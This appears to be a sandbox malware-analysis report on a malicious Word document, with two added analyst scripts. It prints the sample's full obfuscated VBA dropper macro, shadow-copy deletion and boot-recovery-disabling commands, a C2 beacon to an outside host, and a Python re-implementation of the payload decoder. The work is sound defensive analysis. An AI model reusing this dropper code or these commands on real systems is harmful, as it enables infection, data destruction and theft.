universityalliance.com_subpoena.doc
This report is generated from a file or URL submitted to this webservice on June 14th 2016 17:38:12 (UTC) and action script Random desktop files
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v4.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware/Leak: POSTs files to a webserver
- Ransomware: Deletes volume snapshots (often used by Ransomware)
- Persistence: Injects into explorer; spawns a lot of processes
- Network Behavior: Contacts 1 domain and 1 host
Indicators
Not all malicious and suspicious indicators are displayed in this report.
Malicious Indicators (14)

Anti-Detection/Stealthiness
Tries to suppress failures during boot (often used to hide system changes)
- details: "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
- source: Monitored Target
- relevance: 8/10
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET TROJAN Trojan Generic - POST To gate.php with no referer" (SID: 2017930, Rev: 9, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET TROJAN H1N1 Loader CnC Beacon M1" (SID: 2021139, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN H1N1 Loader CnC Beacon HTTP Header" (SID: 2820096, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.) - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
-
2/56 Antivirus vendors marked sample as malicious (3% detection rate)
1/42 Antivirus vendors marked sample as malicious (2% detection rate) - source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
General
Document spawns new processes
- details: Document spawned a new process (macro present)
- source: Indicator Combinations
- relevance: 7/10

The input sample dropped a file that was identified as malicious
- details: 3/56 Antivirus vendors marked dropped file "contraire.exe" as malicious (classified as "Inject" with 5% detection rate)
- source: Binary File
- relevance: 10/10
Installation/Persistence
Disables startup repair
- details: "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no"
- source: Monitored Target
- relevance: 8/10

Injects into explorer
- details: Injected into "explorer.exe"
- source: Monitored Target
- relevance: 5/10
Ransomware/Banking
Deletes volume snapshots (often used by Ransomware)
- details: "vssadmin.exe" with commandline "delete shadows /all /quiet"
- source: Monitored Target
- relevance: 10/10

System Destruction
Deletes volume snapshots (often used by Ransomware)
- details: "vssadmin.exe" with commandline "delete shadows /all /quiet" (the same vssadmin event as above, listed under a second category)
- source: Monitored Target
- relevance: 10/10
System Security
References security related windows services
- details: "}2V]uAerRbfe=4_&" (a heuristic match in file/memory; the matched bytes are not a readable service name, so treat this hit with caution)
- source: File/Memory
- relevance: 7/10
Unusual Characteristics
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details: Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source: Static Parser
- relevance: 10/10

Contains embedded string that indicates auto-execute behavior
- details: Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source: File/Memory
- relevance: 10/10

Spawns a lot of processes
- details:
  - Spawned process "WINWORD.EXE" with commandline "/n "C:\e2db3261028a110c6f910f59fb0fcd506c671d5119f6a4dba9b15e6655670d3b.doc""
  - Spawned process "contraire.exe"
  - Spawned process "contraire.exe"
  - Spawned process "explorer.exe"
  - Spawned process "vssadmin.exe" with commandline "delete shadows /all /quiet"
  - Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no"
  - Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
- source: Monitored Target
- relevance: 8/10

1 further malicious indicator is hidden (available only in the private webservice or standalone version).

Suspicious Indicators (12)

Anti-Reverse Engineering
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details: SetUnhandledExceptionFilter@KERNEL32.DLL from contraire.exe (PID: 3056), reported six times
- source: Hybrid Analysis Technology
- relevance: 1/10
Environment Awareness
Possibly tries to evade analysis by sleeping many times
- details: "WINWORD.EXE" (Thread ID: 3032) slept "320" times (threshold: 300). The sleeping thread is inside the Word host process, not the dropped binary, so on its own this is weak evidence of evasion.
- source: API Call
- relevance: 10/10
General
Contains ability to find and load resources of a specific module
- details: FindResourceA@KERNEL32.DLL from contraire.exe (PID: 3056)
- source: Hybrid Analysis Technology
- relevance: 1/10

POSTs files to a webserver
- details: the following request was recorded with no payload, although it declares Content-Length: 88 (the body was not captured):
  POST /h/gate.php HTTP/1.1
  Accept: */*
  accept-Encoding: none
  accept-Language: en-US.q=0.8
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: ronwiruligh.com
  Content-Length: 88
  Connection: Keep-Alive
  Cache-Control: no-cache
- source: Network Traffic
- relevance: 5/10
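A check of the captured beacon against the conditions the ET alert description names (a POST to a URI ending in gate.php with no Referer header), as an added example rather than the Suricata signature itself or any Hybrid Analysis code. The request text is copied from the report above, constructed here as a Python string; the two extra checks at the end (header-name capitalisation and the `.q=` in Accept-Language) are heuristics of this example, based on the observation that a genuine MSIE 7 client sends `Accept-Encoding` / `Accept-Language` with a leading capital and separates quality values with `;q=`. Hand-rolled HTTP stacks in loaders often leak such inconsistencies, which is a useful hunting signal on top of the signature.

```python
# The beacon as printed in the report (its body was not captured there either).
CAPTURED = (
    "POST /h/gate.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "accept-Encoding: none\r\n"
    "accept-Language: en-US.q=0.8\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    ".NET4.0C; .NET4.0E)\r\n"
    "Host: ronwiruligh.com\r\n"
    "Content-Length: 88\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into request line, ordered (name, value)
    headers and body. Header names are kept verbatim so their spelling and
    capitalisation can be inspected later."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def header(req: dict, name: str):
    """Case-insensitive header lookup; None when the header is absent."""
    for n, v in req["headers"]:
        if n.lower() == name.lower():
            return v
    return None


def gate_php_post_without_referer(req: dict) -> bool:
    """The conditions the ET 'POST To gate.php with no referer' description names."""
    path = req["target"].split("?", 1)[0].lower()
    return (req["method"] == "POST"
            and path.endswith("/gate.php")
            and header(req, "Referer") is None)


def _canonical(name: str) -> str:
    # Word-Dash-Word form, e.g. accept-Encoding -> Accept-Encoding
    return "-".join(p[:1].upper() + p[1:] for p in name.split("-"))


def header_case_anomalies(req: dict) -> list:
    """Header names whose capitalisation does not match what the claimed client
    (MSIE) would emit. Heuristic added for this example, not part of the ET rule."""
    return [n for n, _ in req["headers"] if n != _canonical(n)]


def malformed_quality_value(req: dict) -> bool:
    """'en-US.q=0.8' uses '.' where a real client writes ';q='. Heuristic."""
    v = header(req, "Accept-Language") or ""
    return "q=" in v and ";q=" not in v.replace(" ", "")


def declared_vs_captured_body(req: dict) -> tuple:
    """Content-Length the client announced versus bytes actually captured."""
    declared = int(header(req, "Content-Length") or 0)
    return declared, len(req["body"].encode())


def assess(raw: str) -> dict:
    """Run every check over one raw request and return the findings."""
    req = parse_request(raw)
    return {
        "gate_php_beacon": gate_php_post_without_referer(req),
        "header_case_anomalies": header_case_anomalies(req),
        "malformed_q": malformed_quality_value(req),
        "body": declared_vs_captured_body(req),
    }


if __name__ == "__main__":
    for k, v in assess(CAPTURED).items():
        print(f"{k:22} {v}")
```

`assess(CAPTURED)` reports the beacon condition as met, flags `accept-Encoding` and `accept-Language`, flags the `.q=` value and returns `(88, 0)` for the declared versus captured body, which is the gap the report's "with no payload" wording refers to.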
Installation/Persistence
Drops executable files
- details: "contraire.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source: Binary File
- relevance: 10/10

Touches files in the Windows directory
- details:
  - "WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
  - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
  - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
  - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
  - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
  - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
  - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
  - "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
  - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
  - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
  - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
  - "WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
  - "WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
  - "WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
  - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5C79E07-098D-4F1C-BB33-FE54500E580C}.tmp"
  - "WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
  - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB36534A-173A-47DB-88E9-562E23718A08}.tmp"
  - "WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
  - "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{66E23C84-5106-4022-BD40-5187D5099D76}.tmp"
- source: API Call
- relevance: 7/10
System Security
Hooks API calls
- details:
  - "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
  - "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
  - "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
  - "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
  - "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
- source: Hook Detection
- relevance: 10/10
Unusual Characteristics
Contains embedded VBA macros with suspicious keywords
- details:
  - Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
  - Found suspicious keyword "WScript.Shell" which indicates: "May run an executable file or a system command"
  - Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings"
  - Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
  - Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
  - Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
  - Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
  - Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
  - Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  - Found suspicious keyword "Open" which indicates: "May open a file"
- source: Static Parser
- relevance: 10/10

Contains embedded string with suspicious keywords
- details:
  - Found suspicious keyword "Open" which indicates: "May open a file"
  - Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
  - Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
  - Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
  - Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
  - Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  - Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
- source: File/Memory
- relevance: 10/10
Installs hooks/patches the running process
- details:
  - "WINWORD.EXE" wrote bytes "b811110000663d33c0ba90bf550068dcf57a62c3" to virtual address "0x0051842C"
  - "WINWORD.EXE" wrote bytes "b800000000663d33c0ba9c684d0068dcf57a62c3" to virtual address "0x0051840C"
  - "WINWORD.EXE" wrote bytes "4207f645" to virtual address "0x6B54CA70" (part of module "GFX.DLL")
  - "WINWORD.EXE" wrote bytes "ba8c552e04b98b7b7a62ffe1" to virtual address "0x004FFC42"
  - "WINWORD.EXE" wrote bytes "e99a5475f0" to virtual address "0x77513E59" ("SysFreeString@OLEAUT32.DLL")
  - "WINWORD.EXE" wrote bytes "e9c53224f2" to virtual address "0x75FD6143" ("OleLoadFromStream@OLE32.DLL")
  - "WINWORD.EXE" wrote bytes "ba7cfc2d04b98b7b7a62ffe1" to virtual address "0x004FFC2E"
  - "WINWORD.EXE" wrote bytes "ba74822e04b98b7b7a62ffe1" to virtual address "0x004FFC6A"
  - "WINWORD.EXE" wrote bytes "e9239978f0" to virtual address "0x77515DEE" ("VariantChangeType@OLEAUT32.DLL")
  - "WINWORD.EXE" wrote bytes "c4cade7580bbde7552bade759fbbde7508bbde7546cede756138df75de2fdf75d0d9de75000000001779ef764f91ef767f6fef76f4f7ef7611f7ef76f283ef76857eef7600000000" to virtual address "0x6B521000" (part of module "MSIMG32.DLL")
  - "WINWORD.EXE" wrote bytes "a2bdf145" to virtual address "0x6A39F530" (part of module "WWLIB.DLL")
  - "WINWORD.EXE" wrote bytes "79bd5845" to virtual address "0x2FC91B94" (part of module "WINWORD.EXE")
  - "WINWORD.EXE" wrote bytes "e9603376f0" to virtual address "0x77514731" ("SysAllocStringByteLen@OLEAUT32.DLL")
  - "WINWORD.EXE" wrote bytes "b811110000663d33c0ba3cc0550068dcf57a62c3" to virtual address "0x004FF194"
  - "WINWORD.EXE" wrote bytes "b800000000663d33c0ba1c684d0068dcf57a62c3" to virtual address "0x005183EC"
  - "WINWORD.EXE" wrote bytes "782ff445" to virtual address "0x68E978E4" (part of module "OART.DLL")
  - "WINWORD.EXE" wrote bytes "2094b945" to virtual address "0x67E90BA8" (part of module "MSO.DLL")
  - "WINWORD.EXE" wrote bytes "ba74c45500b98b7b7a62ffe1" to virtual address "0x004FFC56"
  - "WINWORD.EXE" wrote bytes "7162b844" to virtual address "0x62EA9904" (part of module "RICHED20.DLL")
  - "WINWORD.EXE" wrote bytes "e99e48e4f1" to virtual address "0x75DF3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
- source: Hook Detection
- relevance: 10/10

2 further suspicious indicators are hidden (available only in the private webservice or standalone version).

Informative Indicators (11)

Environment Awareness
Contains ability to query machine time
- details: GetSystemTimeAsFileTime@KERNEL32.DLL from contraire.exe (PID: 3056)
- source: Hybrid Analysis Technology
- relevance: 1/10
General
Contacts domains
- details: "ronwiruligh.com"
- source: Network Traffic
- relevance: 1/10

Contacts server
- details: "93.171.202.176:80"
- source: Network Traffic
- relevance: 1/10

Contains embedded VBA macros
- details:
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub HeaderFooterProperty()
Dim MyText As String
MyText = "<Replace this with your text>"
ActiveWindow.ActivePane.View.SeekView = wdSeekCurrentPageHeader
Selection.HeaderFooter.Range.Text = "MyText"
ActiveWindow.ActivePane.View.SeekView = wdSeekMainDocument
End Sub
Sub PasteMethod()
Dim MyRange As Object
Set MyRange = Selection.Range
' Selection Example:
Selection.Paste
' Range Example:
MyRange.Collapse Direction:=wdCollapseStart
MyRange.Paste
End Sub
Public Sub AutoOpen()
Dim centerfield As String
Dim flowing As Long
Dim ruade As Integer
Dim subterminal As Integer
ruade = sin(5)
If ruade = 107 - 33 + 29234 Then
PasteMethod
Else
Dim angiogram As Integer
tabble = condylura.Tag
repudiate = 65 + 13 - 116 + 50
Select Case repudiate
Case 1 To 12
anaspid = Mid("chruchwardenfiargyroxiphium", 13, 2) + Lcase("BBInG")
Case 13
janissary = Lcase("al") & Lcase("b")
honeybee = "lo" & Right("rentieroted", 4)
Case 14
trisyllable = Mid("oblatebamycomycin", 7, 2) + Mid("derricknkrodollar", 8, 4) + "ll"
End Select
End If
End Sub"
File "trigonometrician.bas" (Streampath: "Macros/VBA/trigonometrician") has code: "Sub mesothelioma(hindshank, chopin)
Open hindshank For Binary Access Read Write As #chopin
End Sub
Sub deist(collocalia, handfast)
Dim estop As Integer
Set prosepct = collocalia
farmer = 19 - 90 + 72
If sin(farmer) <> 60 Then
microelectronic = Lcase("ru") & Lcase("n")
Else
microelectronic = "koine"
End If
tyranny = CallByName(prosepct, microelectronic, farmer, handfast)
End Sub
Function smokey()
If cos(62) > 54 Then
depict = Right("beguilementpr", 2) & "ocyo" & Lcase("n")
Else
Dim needfulness As Byte
Dim hilltop As Long
radyera = Lcase("SC") & Lcase("riPtiNG.")
propos = Right("cardinalfishFile", 4) + Mid("dagdaSystemObjectpectoral", 6, 12)
End If
If atn(85) > 68 Then
anarchically = StrReverse("ana") + Left("cyclusbouche", 6)
Else
myricales = radyera + propos
Dim neoteric As Byte
Set aflame = CreateObject(myricales)
concurring = 42 + 41 + 12 - 94
End If
smokey = CallByName(aflame, "GetSpecialFolder", concurring, 40 - 52 + 14)
End Function
Sub halfcentury()
megaloptera = "interview"
Dim deontology As String
If tan(62) > 56 Then
momentarily = Mid("cravenlanlankiness", 7, 3) + Mid("irreverentdscapablative", 11, 5) + "ist"
Else
Dim adulterous As String
deontology = smokey
Dim ance As Integer
End If
majeure = 66
Select Case majeure
Case 8 To 12
Dim homegrown As Long
Dim dysgenesis As Integer
undercover = Mid("fieldworkcococcinellidae", 10, 2) + Left("nchoidpatwin", 6)
Case 66
adulterous = deontology + "\" + Lcase("cO") + Left("ntraieolith", 5) + Left("re.exewinless", 6)
alcaid = Mid("acquirercheadvanced", 9, 3) + Right("bigamisteseca", 5) + Left("keliquidate", 2)
End Select
metrification = 59
Select Case metrification
Case 40 To 44
Dim steerer As Integer
Dim socinian As Variant
tyne = Left("agrobinia", 2) + Mid("bambusalaonnonradioactive", 8, 4) + Left("emamantrap", 3)
Case 59
ballade = FreeFile
End Select
confucian = 0
phoenicurus = confucian
mesothelioma adulterous, ballade
periploca = condylura.cynicism
mariolatry = periploca
gond = aeration(mariolatry)
Dim pilgrim As Long
If cos(33) > 71 Then
filler = "ne" & Mid("alphabeticallyreuslanguille", 15, 4)
Else
nonadmission = Len(gond)
Call trigonometrician.moehringia(gond, ballade, gond, periploca)
Close #ballade
Set jog = CreateObject("WScript.Shell")
End If
deist jog, adulterous
End Sub
Function aeration(comprised) As String
Dim fiduciary() As Byte
Dim baboonish(63) As Long
Dim auscultatory() As Byte
Dim contrasted As Integer
Dim fallacious(255) As Byte
Dim postmistress As Long
Dim headspace(63) As Long
Dim casern As Long
Dim breastwork As String
Dim morphophonemics As Long
Dim grossieret As Long
Dim plenus(63) As Long
shark = 26 + 107 - 71 + 65218
bombastic = 1 - 103 - 91 + 449
caracal = 64
membra = 38 - 14 - 105 + 16515153
bawd = 65536
shaktist = 258048
monetarism = 76 + 91 - 23 + 16711536
shapen = 93 + 3 + 108 + 51
anteposition = 125 - 35 - 72 + 4078
bakshish = 4032
adriatic = 262144
arawak = 75 - 12
Dim larger As Variant
Dim wormcast() As Byte
wormcast = StrConv(comprised, vbFromUnicode)
Dim molybdenite As Byte
For frameup = 0 To UBound(wormcast)
wormcast(frameup) = wormcast(frameup) Xor 17
Next frameup
afternoon = 42 - 35
Select Case afternoon
Case 1 To 4
uncomfortably = Ucase("Al") & Mid("diseaseloyenavarch", 8, 4) & Right("bylined", 1)
Case 5
nephrectomy = Lcase("mA") & Ucase("RTe")
consecate = "dia" + Mid("cagegnosticcalcimine", 5, 7)
Case 8
reparation = Ucase("Ti") + Mid("perfumerytaneavolation", 10, 4) + Left("ssactivism", 2)
archidiaconate = Ucase("SQU") + Right("paradisaeidaeeezers", 6)
End Select
stakeout = StrConv(wormcast, vbUnicode)
contrasted = 2
For morphophonemics = 0 To 255
Select Case morphophonemics
Case 65 To 90
fallacious(morphophonemics) = morphophonemics - 65
Case 97 To 122
fallacious(morphophonemics) = morphophonemics - 71
Case 48 To 57
fallacious(morphophonemics) = morphophonemics + 4
Case 43
fallacious(morphophonemics) = 62
Case 47
fallacious(morphophonemics) = 63
End Select
Next morphophonemics
For morphophonemics = 0 To 63
baboonish(morphophonemics) = morphophonemics * caracal
plenus(morphophonemics) = morphophonemics * anteposition
headspace(morphophonemics) = morphophonemics * adriatic
Next morphophonemics
fiduciary = StrConv(stakeout, vbFromUnicode)
numenius = 48 - 87 + 118 - 75
ReDim auscultatory((((UBound(fiduciary) + 1) \ numenius) * 3) - 1)
For casern = 0 To UBound(fiduciary) Step 4
grossieret = headspace(fallacious(fiduciary(casern))) + plenus(fallacious(fiduciary(casern + 1))) + _
baboonish(fallacious(fiduciary(casern + 2))) + fallacious(fiduciary(casern + 3))
morphophonemics = grossieret And monetarism
auscultatory(postmistress) = morphophonemics \ bawd
morphophonemics = grossieret And shark
auscultatory(postmistress + 1) = morphophonemics \ bombastic
auscultatory(postmistress + 2) = grossieret And shapen
postmistress = postmistress + 3
Next casern
breastwork = StrConv(auscultatory, vbUnicode)
If contrasted Then breastwork = Left$(breastwork, Len(breastwork) - contrasted)
aeration = breastwork
End Function
Sub SortText()
' A macro to sort the selected text, if the user has selected
' more than one paragraph
If Documents.Count > 0 Then
' The user has at least one document open.
If Selection.Paragraphs.Count > 1 Then
' The user has selected more than one paragraph
' of text, so sort it.
Selection.Sort
Else
' Tell the user what to do.
MsgBox "Please select two or more paragraphs and try again."
End If
End If
End Sub
Public Sub moehringia(argonaut, ByRef favillous, mythological, dyewood)
Dim alga As Variant
Dim ingression() As Byte
Dim briticism As Integer
ingression = StrConv(mythological, vbFromUnicode)
gleditsia = Right("workbasketmu", 2) + Mid("addlerderateles", 6, 4) + StrReverse("re")
atoll = favillous
Put #atoll, , ingression
End Sub
Sub HeaderFooterObject()
Dim MyText As String
MyHeaderText = "<Replace this with your text>"
MyFooterText = "<Replace this with your text>"
With ActiveDocument.Sections(1)
.Headers(wdHeaderFooterPrimary).Range.Text = MyHeaderText
.Footers(wdHeaderFooterPrimary).Range.Text = MyFooterText
End With
End Sub"
File "condylura.frm" (Streampath: "Macros/VBA/condylura") has code: "Sub UserForm_Initialize()
If sin(44) <> 37 Then
trigonometrician.halfcentury
End If
End Sub"
- source: Static Parser
- relevance: 10/10
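What the macro listing above actually does, as an added analyst script (not code from the sample and not part of the Hybrid Analysis report): the `AutoOpen` body is inert, but its reference to `condylura.Tag` instantiates the UserForm, whose `UserForm_Initialize` calls `trigonometrician.halfcentury`. That routine reads the encoded payload from a control on the form (`condylura.cynicism`), runs it through `aeration` (XOR every byte with 17, then a hand-rolled base64 decode that always drops the last two output bytes), writes the result to `<temp folder>\contraire.exe` with `Open ... For Binary` and `Put`, and starts it through `CallByName(WScript.Shell, "run", VbMethod, path)`. The Python below re-implements `aeration` constant for constant and rebuilds the strings the macro splits across `Mid`/`Left`/`Right`/`LCase` calls. The encoded input is constructed for the test because the report does not include the form's data, and `%TEMP%` stands in for the folder `GetSpecialFolder(2)` returns on the host.

```python
import base64

# Values the macro hides behind arithmetic, evaluated from the listing.
XOR_KEY = 17                            # wormcast(frameup) Xor 17
SHARK = 26 + 107 - 71 + 65218           # 65280    = 0x00FF00
BOMBASTIC = 1 - 103 - 91 + 449          # 256
CARACAL = 64                            # 2**6
BAWD = 65536                            # 2**16
MONETARISM = 76 + 91 - 23 + 16711536    # 16711680 = 0xFF0000
SHAPEN = 93 + 3 + 108 + 51              # 255
ANTEPOSITION = 125 - 35 - 72 + 4078     # 4096     = 2**12
ADRIATIC = 262144                       # 2**18
CONTRASTED = 2                          # trailing output bytes dropped unconditionally


def _fallacious() -> list:
    """Base64 alphabet table built exactly like the macro's 'fallacious' array.
    Anything unlisted, including '=', stays 0 (an uninitialised VBA Byte)."""
    t = [0] * 256
    for c in range(256):
        if 65 <= c <= 90:
            t[c] = c - 65          # 'A'..'Z' -> 0..25
        elif 97 <= c <= 122:
            t[c] = c - 71          # 'a'..'z' -> 26..51
        elif 48 <= c <= 57:
            t[c] = c + 4           # '0'..'9' -> 52..61
        elif c == 43:
            t[c] = 62              # '+'
        elif c == 47:
            t[c] = 63              # '/'
    return t


def aeration(comprised: bytes) -> bytes:
    """Emulates Function aeration(): XOR each byte with 17, decode base64 four
    characters at a time, then strip CONTRASTED bytes from the end."""
    stakeout = bytes(b ^ XOR_KEY for b in comprised)
    if len(stakeout) % 4:
        # The macro's 'For casern = 0 To UBound(fiduciary) Step 4' reads past
        # the array on such input and dies with 'Subscript out of range'.
        raise ValueError("encoded length must be a multiple of 4")
    table = _fallacious()
    out = bytearray()
    for i in range(0, len(stakeout), 4):
        a, b, c, d = (table[x] for x in stakeout[i:i + 4])
        grossieret = a * ADRIATIC + b * ANTEPOSITION + c * CARACAL + d   # 24-bit group
        out.append((grossieret & MONETARISM) // BAWD)
        out.append((grossieret & SHARK) // BOMBASTIC)
        out.append(grossieret & SHAPEN)
    return bytes(out[:max(0, len(out) - CONTRASTED)])


# VBA string functions (1-based Mid) used to rebuild the split strings.
def vb_mid(s, start, length):
    return s[start - 1:start - 1 + length]


def vb_left(s, n):
    return s[:n]


def vb_right(s, n):
    return s[len(s) - n:]


def rebuilt_strings(temp_dir: str = "%TEMP%") -> dict:
    """The strings smokey/halfcentury/deist assemble at run time. temp_dir stands
    in for FileSystemObject.GetSpecialFolder(2), resolved on the victim host."""
    radyera = "SC".lower() + "riPtiNG.".lower()
    propos = vb_right("cardinalfishFile", 4) + vb_mid("dagdaSystemObjectpectoral", 6, 12)
    adulterous = (temp_dir + "\\" + "cO".lower()
                  + vb_left("ntraieolith", 5) + vb_left("re.exewinless", 6))
    return {
        "progid": radyera + propos,                   # scripting.FileSystemObject
        "special_folder": 40 - 52 + 14,               # 2 = TemporaryFolder
        "dropped_path": adulterous,                   # %TEMP%\contraire.exe
        "shell_method": "ru".lower() + "n".lower(),   # WScript.Shell.run
        "calltype": 19 - 90 + 72,                     # 1 = VbMethod for CallByName
    }


def constructed_sample() -> tuple:
    """A stand-in payload (constructed; not the real contraire.exe): 64 bytes that
    begin with an MZ header, so its base64 ends in '==' and the macro's fixed
    2-byte strip removes only padding."""
    payload = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + b"\x00" * 48
    encoded = bytes(b ^ XOR_KEY for b in base64.b64encode(payload))
    return payload, encoded


if __name__ == "__main__":
    payload, encoded = constructed_sample()
    print("round-trip ok:", aeration(encoded) == payload)
    print(rebuilt_strings())
```

On a real sample, feed `aeration` the raw bytes of the form control's text (the UserForm stream data, which tools such as oletools' `olevba` can dump) and check the result for an `MZ` header. Because the strip is a fixed two bytes rather than padding-driven, the decoder only round-trips cleanly when the base64 text ends in `==`; a payload whose base64 ends in `=` or has no padding loses one or two real bytes, which a PE usually tolerates but a hash comparison will not.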
Creates a writable file in a temporary directory
- details:
  - "WINWORD.EXE" created file "%TEMP%\~DFCFA03069C9A3F7F8.TMP"
  - "WINWORD.EXE" created file "%TEMP%\~DFBFD6C115F2267F85.TMP"
  - "WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
  - "WINWORD.EXE" created file "%TEMP%\~DFF0C0473C3F607E42.TMP"
  - "WINWORD.EXE" created file "%TEMP%\~DF3BD2D38CC1D34C55.TMP"
  - "WINWORD.EXE" created file "%TEMP%\contraire.exe"
  - "WINWORD.EXE" created file "%TEMP%\~DFF38E54BBB980442D.TMP"
- source: API Call
- relevance: 1/10
Creates mutants
- details:
  - "\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-60938"
  - "\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-60938"
  - "\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  - "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
- source: Created Mutant
- relevance: 3/10
Launches a browser
- details: Launches browser "firefox.exe"
- source: Monitored Target
- relevance: 3/10

Loads rich edit control libraries
- details: "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 62E60000
- source: Loaded Module
Spawns new processes
- details:
  - Spawned process "contraire.exe"
  - Spawned process "explorer.exe"
  - Spawned process "firefox.exe" with commandline "-osint -url "%1""
  - Spawned process "vssadmin.exe" with commandline "delete shadows /all /quiet"
  - Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no"
